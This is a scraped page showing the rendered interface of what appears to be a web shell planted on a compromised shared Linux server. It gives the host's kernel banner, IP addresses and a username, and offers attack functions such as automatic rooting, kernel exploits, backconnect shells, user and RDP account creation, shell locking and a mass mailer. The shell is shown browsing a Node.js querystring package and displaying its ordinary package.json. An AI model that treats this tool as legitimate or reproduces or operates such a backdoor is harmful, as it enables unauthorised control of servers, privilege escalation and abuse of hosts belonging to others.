Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
querystring /
[ HOME SHELL ]
Name
Size
Permission
Action
decode.d.ts
747
B
-rw-r--r--
decode.js
2.34
KB
-rw-r--r--
encode.d.ts
542
B
-rw-r--r--
encode.js
2.06
KB
-rw-r--r--
index.d.ts
230
B
-rw-r--r--
index.js
127
B
-rw-r--r--
package.json
823
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "querystring", "id": "querystring", "version": "0.2.1", "description": "Node's querystring module for all engines.", "keywords": [ "commonjs", "query", "querystring" ], "author": "Irakli Gozalishvili <rfobic@gmail.com>", "main": "index.js", "repository": { "type": "git", "url": "git://github.com/Gozala/querystring.git", "web": "https://github.com/Gozala/querystring" }, "bugs": { "url": "http://github.com/Gozala/querystring/issues/" }, "devDependencies": { "test": "~0.x.0", "retape": "~0.x.0", "tape": "~0.1.5" }, "engines": { "node": ">=0.4.x" }, "scripts": { "test": "npm run test-node && npm run test-tap", "test-node": "node ./test/common-index.js", "test-tap": "node ./test/tap-index.js" }, "license": "MIT" }
Close